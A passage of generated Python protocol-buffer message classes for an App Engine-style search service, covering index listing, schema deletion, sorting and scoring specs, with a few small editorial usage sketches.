if self.has_fetch_schema_: res+=prefix+("fetch_schema: %s\n" % self.DebugFormatBool(self.fetch_schema_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_namespace_: res+=prefix+("namespace: %s\n" % self.DebugFormatString(self.namespace_))
if self.has_start_index_name_: res+=prefix+("start_index_name: %s\n" % self.DebugFormatString(self.start_index_name_))
if self.has_include_start_index_: res+=prefix+("include_start_index: %s\n" % self.DebugFormatBool(self.include_start_index_))
if self.has_index_name_prefix_: res+=prefix+("index_name_prefix: %s\n" % self.DebugFormatString(self.index_name_prefix_))
if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
if self.has_source_: res+=prefix+("source: %s\n" % self.DebugFormatInt32(self.source_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfetch_schema = 1
klimit = 2
knamespace = 3
kstart_index_name = 4
kinclude_start_index = 5
kindex_name_prefix = 6
koffset = 7
ksource = 8
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "fetch_schema",
2: "limit",
3: "namespace",
4: "start_index_name",
5: "include_start_index",
6: "index_name_prefix",
7: "offset",
8: "source",
}, 8)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.STRING,
7: ProtocolBuffer.Encoder.NUMERIC,
8: ProtocolBuffer.Encoder.NUMERIC,
}, 8, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListIndexesParams'
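# --- Editorial sketch (not part of the generated protocol) ------------------
# ListIndexesParams has no required fields; this fills in the paging-related
# accessors defined above.  The helper name is illustrative only.
def _example_list_indexes_params():
  params = ListIndexesParams()
  params.set_limit(50)                  # overrides the default of 20
  params.set_index_name_prefix('users-')
  params.set_fetch_schema(1)            # also return each index's schema
  return params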
class ListIndexesRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = ListIndexesParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListIndexesRequest'
class ListIndexesResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
def __init__(self, contents=None):
self.status_ = RequestStatus()
self.index_metadata_ = []
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def mutable_status(self): self.has_status_ = 1; return self.status_
def clear_status(self):self.has_status_ = 0; self.status_.Clear()
def has_status(self): return self.has_status_
def index_metadata_size(self): return len(self.index_metadata_)
def index_metadata_list(self): return self.index_metadata_
def index_metadata(self, i):
return self.index_metadata_[i]
def mutable_index_metadata(self, i):
return self.index_metadata_[i]
def add_index_metadata(self):
x = IndexMetadata()
self.index_metadata_.append(x)
return x
def clear_index_metadata(self):
self.index_metadata_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.mutable_status().MergeFrom(x.status())
for i in xrange(x.index_metadata_size()): self.add_index_metadata().CopyFrom(x.index_metadata(i))
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if len(self.index_metadata_) != len(x.index_metadata_): return 0
for e1, e2 in zip(self.index_metadata_, x.index_metadata_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
elif not self.status_.IsInitialized(debug_strs): initialized = 0
for p in self.index_metadata_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.status_.ByteSize())
n += 1 * len(self.index_metadata_)
for i in xrange(len(self.index_metadata_)): n += self.lengthString(self.index_metadata_[i].ByteSize())
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthString(self.status_.ByteSizePartial())
n += 1 * len(self.index_metadata_)
for i in xrange(len(self.index_metadata_)): n += self.lengthString(self.index_metadata_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
self.clear_index_metadata()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSize())
self.status_.OutputUnchecked(out)
for i in xrange(len(self.index_metadata_)):
out.putVarInt32(18)
out.putVarInt32(self.index_metadata_[i].ByteSize())
self.index_metadata_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(10)
out.putVarInt32(self.status_.ByteSizePartial())
self.status_.OutputPartial(out)
for i in xrange(len(self.index_metadata_)):
out.putVarInt32(18)
out.putVarInt32(self.index_metadata_[i].ByteSizePartial())
self.index_metadata_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_status().TryMerge(tmp)
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_index_metadata().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_:
res+=prefix+"status <\n"
res+=self.status_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt=0
for e in self.index_metadata_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("index_metadata%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kindex_metadata = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "index_metadata",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.ListIndexesResponse'
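# --- Editorial sketch (not part of the generated protocol) ------------------
# Reading a serialized ListIndexesResponse: index_metadata_list() returns the
# repeated IndexMetadata group as a plain Python list, and each element is
# assumed to expose index_spec() as defined earlier in this module.
def _example_read_list_indexes_response(serialized):
  response = ListIndexesResponse(serialized)
  names = [m.index_spec().name() for m in response.index_metadata_list()]
  return response.status().code(), names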
class DeleteSchemaParams(ProtocolBuffer.ProtocolMessage):
has_source_ = 0
source_ = 0
def __init__(self, contents=None):
self.index_spec_ = []
if contents is not None: self.MergeFromString(contents)
def source(self): return self.source_
def set_source(self, x):
self.has_source_ = 1
self.source_ = x
def clear_source(self):
if self.has_source_:
self.has_source_ = 0
self.source_ = 0
def has_source(self): return self.has_source_
def index_spec_size(self): return len(self.index_spec_)
def index_spec_list(self): return self.index_spec_
def index_spec(self, i):
return self.index_spec_[i]
def mutable_index_spec(self, i):
return self.index_spec_[i]
def add_index_spec(self):
x = IndexSpec()
self.index_spec_.append(x)
return x
def clear_index_spec(self):
self.index_spec_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_source()): self.set_source(x.source())
for i in xrange(x.index_spec_size()): self.add_index_spec().CopyFrom(x.index_spec(i))
def Equals(self, x):
if x is self: return 1
if self.has_source_ != x.has_source_: return 0
if self.has_source_ and self.source_ != x.source_: return 0
if len(self.index_spec_) != len(x.index_spec_): return 0
for e1, e2 in zip(self.index_spec_, x.index_spec_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.index_spec_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
n += 1 * len(self.index_spec_)
for i in xrange(len(self.index_spec_)): n += self.lengthString(self.index_spec_[i].ByteSize())
return n
def ByteSizePartial(self):
n = 0
if (self.has_source_): n += 1 + self.lengthVarInt64(self.source_)
n += 1 * len(self.index_spec_)
for i in xrange(len(self.index_spec_)): n += self.lengthString(self.index_spec_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_source()
self.clear_index_spec()
def OutputUnchecked(self, out):
if (self.has_source_):
out.putVarInt32(8)
out.putVarInt32(self.source_)
for i in xrange(len(self.index_spec_)):
out.putVarInt32(18)
out.putVarInt32(self.index_spec_[i].ByteSize())
self.index_spec_[i].OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_source_):
out.putVarInt32(8)
out.putVarInt32(self.source_)
for i in xrange(len(self.index_spec_)):
out.putVarInt32(18)
out.putVarInt32(self.index_spec_[i].ByteSizePartial())
self.index_spec_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_source(d.getVarInt32())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_index_spec().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_source_: res+=prefix+("source: %s\n" % self.DebugFormatInt32(self.source_))
cnt=0
for e in self.index_spec_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("index_spec%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
ksource = 1
kindex_spec = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "source",
2: "index_spec",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteSchemaParams'
class DeleteSchemaRequest(ProtocolBuffer.ProtocolMessage):
has_params_ = 0
has_app_id_ = 0
app_id_ = ""
def __init__(self, contents=None):
self.params_ = DeleteSchemaParams()
if contents is not None: self.MergeFromString(contents)
def params(self): return self.params_
def mutable_params(self): self.has_params_ = 1; return self.params_
def clear_params(self):self.has_params_ = 0; self.params_.Clear()
def has_params(self): return self.has_params_
def app_id(self): return self.app_id_
def set_app_id(self, x):
self.has_app_id_ = 1
self.app_id_ = x
def clear_app_id(self):
if self.has_app_id_:
self.has_app_id_ = 0
self.app_id_ = ""
def has_app_id(self): return self.has_app_id_
def MergeFrom(self, x):
assert x is not self
if (x.has_params()): self.mutable_params().MergeFrom(x.params())
if (x.has_app_id()): self.set_app_id(x.app_id())
def Equals(self, x):
if x is self: return 1
if self.has_params_ != x.has_params_: return 0
if self.has_params_ and self.params_ != x.params_: return 0
if self.has_app_id_ != x.has_app_id_: return 0
if self.has_app_id_ and self.app_id_ != x.app_id_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_params_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: params not set.')
elif not self.params_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(self.params_.ByteSize())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_params_):
n += 1
n += self.lengthString(self.params_.ByteSizePartial())
if (self.has_app_id_): n += 1 + self.lengthString(len(self.app_id_))
return n
def Clear(self):
self.clear_params()
self.clear_app_id()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSize())
self.params_.OutputUnchecked(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def OutputPartial(self, out):
if (self.has_params_):
out.putVarInt32(10)
out.putVarInt32(self.params_.ByteSizePartial())
self.params_.OutputPartial(out)
if (self.has_app_id_):
out.putVarInt32(26)
out.putPrefixedString(self.app_id_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_params().TryMerge(tmp)
continue
if tt == 26:
self.set_app_id(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_params_:
res+=prefix+"params <\n"
res+=self.params_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_app_id_: res+=prefix+("app_id: %s\n" % self.DebugFormatString(self.app_id_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kparams = 1
kapp_id = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "params",
3: "app_id",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteSchemaRequest'
class DeleteSchemaResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.status_ = []
if contents is not None: self.MergeFromString(contents)
def status_size(self): return len(self.status_)
def status_list(self): return self.status_
def status(self, i):
return self.status_[i]
def mutable_status(self, i):
return self.status_[i]
def add_status(self):
x = RequestStatus()
self.status_.append(x)
return x
def clear_status(self):
self.status_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.status_size()): self.add_status().CopyFrom(x.status(i))
def Equals(self, x):
if x is self: return 1
if len(self.status_) != len(x.status_): return 0
for e1, e2 in zip(self.status_, x.status_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.status_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSize())
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.status_)
for i in xrange(len(self.status_)): n += self.lengthString(self.status_[i].ByteSizePartial())
return n
def Clear(self):
self.clear_status()
def OutputUnchecked(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSize())
self.status_[i].OutputUnchecked(out)
def OutputPartial(self, out):
for i in xrange(len(self.status_)):
out.putVarInt32(10)
out.putVarInt32(self.status_[i].ByteSizePartial())
self.status_[i].OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_status().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.status_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("status%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.DeleteSchemaResponse'
class SortSpec(ProtocolBuffer.ProtocolMessage):
has_sort_expression_ = 0
sort_expression_ = ""
has_sort_descending_ = 0
sort_descending_ = 1
has_default_value_text_ = 0
default_value_text_ = ""
has_default_value_numeric_ = 0
default_value_numeric_ = 0.0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def sort_expression(self): return self.sort_expression_
def set_sort_expression(self, x):
self.has_sort_expression_ = 1
self.sort_expression_ = x
def clear_sort_expression(self):
if self.has_sort_expression_:
self.has_sort_expression_ = 0
self.sort_expression_ = ""
def has_sort_expression(self): return self.has_sort_expression_
def sort_descending(self): return self.sort_descending_
def set_sort_descending(self, x):
self.has_sort_descending_ = 1
self.sort_descending_ = x
def clear_sort_descending(self):
if self.has_sort_descending_:
self.has_sort_descending_ = 0
self.sort_descending_ = 1
def has_sort_descending(self): return self.has_sort_descending_
def default_value_text(self): return self.default_value_text_
def set_default_value_text(self, x):
self.has_default_value_text_ = 1
self.default_value_text_ = x
def clear_default_value_text(self):
if self.has_default_value_text_:
self.has_default_value_text_ = 0
self.default_value_text_ = ""
def has_default_value_text(self): return self.has_default_value_text_
def default_value_numeric(self): return self.default_value_numeric_
def set_default_value_numeric(self, x):
self.has_default_value_numeric_ = 1
self.default_value_numeric_ = x
def clear_default_value_numeric(self):
if self.has_default_value_numeric_:
self.has_default_value_numeric_ = 0
self.default_value_numeric_ = 0.0
def has_default_value_numeric(self): return self.has_default_value_numeric_
def MergeFrom(self, x):
assert x is not self
if (x.has_sort_expression()): self.set_sort_expression(x.sort_expression())
if (x.has_sort_descending()): self.set_sort_descending(x.sort_descending())
if (x.has_default_value_text()): self.set_default_value_text(x.default_value_text())
if (x.has_default_value_numeric()): self.set_default_value_numeric(x.default_value_numeric())
def Equals(self, x):
if x is self: return 1
if self.has_sort_expression_ != x.has_sort_expression_: return 0
if self.has_sort_expression_ and self.sort_expression_ != x.sort_expression_: return 0
if self.has_sort_descending_ != x.has_sort_descending_: return 0
if self.has_sort_descending_ and self.sort_descending_ != x.sort_descending_: return 0
if self.has_default_value_text_ != x.has_default_value_text_: return 0
if self.has_default_value_text_ and self.default_value_text_ != x.default_value_text_: return 0
if self.has_default_value_numeric_ != x.has_default_value_numeric_: return 0
if self.has_default_value_numeric_ and self.default_value_numeric_ != x.default_value_numeric_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_sort_expression_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: sort_expression not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.sort_expression_))
if (self.has_sort_descending_): n += 2
if (self.has_default_value_text_): n += 1 + self.lengthString(len(self.default_value_text_))
if (self.has_default_value_numeric_): n += 9
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_sort_expression_):
n += 1
n += self.lengthString(len(self.sort_expression_))
if (self.has_sort_descending_): n += 2
if (self.has_default_value_text_): n += 1 + self.lengthString(len(self.default_value_text_))
if (self.has_default_value_numeric_): n += 9
return n
def Clear(self):
self.clear_sort_expression()
self.clear_sort_descending()
self.clear_default_value_text()
self.clear_default_value_numeric()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.sort_expression_)
if (self.has_sort_descending_):
out.putVarInt32(16)
out.putBoolean(self.sort_descending_)
if (self.has_default_value_text_):
out.putVarInt32(34)
out.putPrefixedString(self.default_value_text_)
if (self.has_default_value_numeric_):
out.putVarInt32(41)
out.putDouble(self.default_value_numeric_)
def OutputPartial(self, out):
if (self.has_sort_expression_):
out.putVarInt32(10)
out.putPrefixedString(self.sort_expression_)
if (self.has_sort_descending_):
out.putVarInt32(16)
out.putBoolean(self.sort_descending_)
if (self.has_default_value_text_):
out.putVarInt32(34)
out.putPrefixedString(self.default_value_text_)
if (self.has_default_value_numeric_):
out.putVarInt32(41)
out.putDouble(self.default_value_numeric_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_sort_expression(d.getPrefixedString())
continue
if tt == 16:
self.set_sort_descending(d.getBoolean())
continue
if tt == 34:
self.set_default_value_text(d.getPrefixedString())
continue
if tt == 41:
self.set_default_value_numeric(d.getDouble())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_sort_expression_: res+=prefix+("sort_expression: %s\n" % self.DebugFormatString(self.sort_expression_))
if self.has_sort_descending_: res+=prefix+("sort_descending: %s\n" % self.DebugFormatBool(self.sort_descending_))
if self.has_default_value_text_: res+=prefix+("default_value_text: %s\n" % self.DebugFormatString(self.default_value_text_))
if self.has_default_value_numeric_: res+=prefix+("default_value_numeric: %s\n" % self.DebugFormat(self.default_value_numeric_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
ksort_expression = 1
ksort_descending = 2
kdefault_value_text = 4
kdefault_value_numeric = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "sort_expression",
2: "sort_descending",
4: "default_value_text",
5: "default_value_numeric",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.DOUBLE,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.SortSpec'
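# --- Editorial sketch (not part of the generated protocol) ------------------
# Populating a SortSpec: sort_expression is the only required field, and the
# direction defaults to descending (sort_descending_ = 1 above).  The helper
# name is illustrative only.
def _example_sort_spec():
  spec = SortSpec()
  spec.set_sort_expression('price')
  spec.set_sort_descending(0)           # sort ascending instead
  spec.set_default_value_numeric(0.0)   # used for documents lacking 'price'
  return spec.Encode()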
class ScorerSpec(ProtocolBuffer.ProtocolMessage):
RESCORING_MATCH_SCORER = 0
MATCH_SCORER = 2
_Scorer_NAMES = {
0: "RESCORING_MATCH_SCORER",
2: "MATCH_SCORER",
}
def Scorer_Name(cls, x): return cls._Scorer_NAMES.get(x, "")
Scorer_Name = classmethod(Scorer_Name)
has_scorer_ = 0
scorer_ = 2
has_limit_ = 0
limit_ = 1000
has_match_scorer_parameters_ = 0
match_scorer_parameters_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def scorer(self): return self.scorer_
def set_scorer(self, x):
self.has_scorer_ = 1
self.scorer_ = x
def clear_scorer(self):
if self.has_scorer_:
self.has_scorer_ = 0
self.scorer_ = 2
def has_scorer(self): return self.has_scorer_
def limit(self): return self.limit_
def set_limit(self, x):
self.has_limit_ = 1
self.limit_ = x
def clear_limit(self):
if self.has_limit_:
self.has_limit_ = 0
self.limit_ = 1000
def has_limit(self): return self.has_limit_
def match_scorer_parameters(self): return self.match_scorer_parameters_
def set_match_scorer_parameters(self, x):
self.has_match_scorer_parameters_ = 1
self.match_scorer_parameters_ = x
def clear_match_scorer_parameters(self):
if self.has_match_scorer_parameters_:
self.has_match_scorer_parameters_ = 0
self.match_scorer_parameters_ = ""
def has_match_scorer_parameters(self): return self.has_match_scorer_parameters_
def MergeFrom(self, x):
assert x is not self
if (x.has_scorer()): self.set_scorer(x.scorer())
if (x.has_limit()): self.set_limit(x.limit())
if (x.has_match_scorer_parameters()): self.set_match_scorer_parameters(x.match_scorer_parameters())
def Equals(self, x):
if x is self: return 1
if self.has_scorer_ != x.has_scorer_: return 0
if self.has_scorer_ and self.scorer_ != x.scorer_: return 0
if self.has_limit_ != x.has_limit_: return 0
if self.has_limit_ and self.limit_ != x.limit_: return 0
if self.has_match_scorer_parameters_ != x.has_match_scorer_parameters_: return 0
if self.has_match_scorer_parameters_ and self.match_scorer_parameters_ != x.match_scorer_parameters_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_scorer_): n += 1 + self.lengthVarInt64(self.scorer_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_match_scorer_parameters_): n += 1 + self.lengthString(len(self.match_scorer_parameters_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_scorer_): n += 1 + self.lengthVarInt64(self.scorer_)
if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
if (self.has_match_scorer_parameters_): n += 1 + self.lengthString(len(self.match_scorer_parameters_))
return n
def Clear(self):
self.clear_scorer()
self.clear_limit()
self.clear_match_scorer_parameters()
def OutputUnchecked(self, out):
if (self.has_scorer_):
out.putVarInt32(8)
out.putVarInt32(self.scorer_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_match_scorer_parameters_):
out.putVarInt32(74)
out.putPrefixedString(self.match_scorer_parameters_)
def OutputPartial(self, out):
if (self.has_scorer_):
out.putVarInt32(8)
out.putVarInt32(self.scorer_)
if (self.has_limit_):
out.putVarInt32(16)
out.putVarInt32(self.limit_)
if (self.has_match_scorer_parameters_):
out.putVarInt32(74)
out.putPrefixedString(self.match_scorer_parameters_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_scorer(d.getVarInt32())
continue
if tt == 16:
self.set_limit(d.getVarInt32())
continue
if tt == 74:
self.set_match_scorer_parameters(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_scorer_: res+=prefix+("scorer: %s\n" % self.DebugFormatInt32(self.scorer_))
if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
if self.has_match_scorer_parameters_: res+=prefix+("match_scorer_parameters: %s\n" % self.DebugFormatString(self.match_scorer_parameters_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kscorer = 1
klimit = 2
kmatch_scorer_parameters = 9
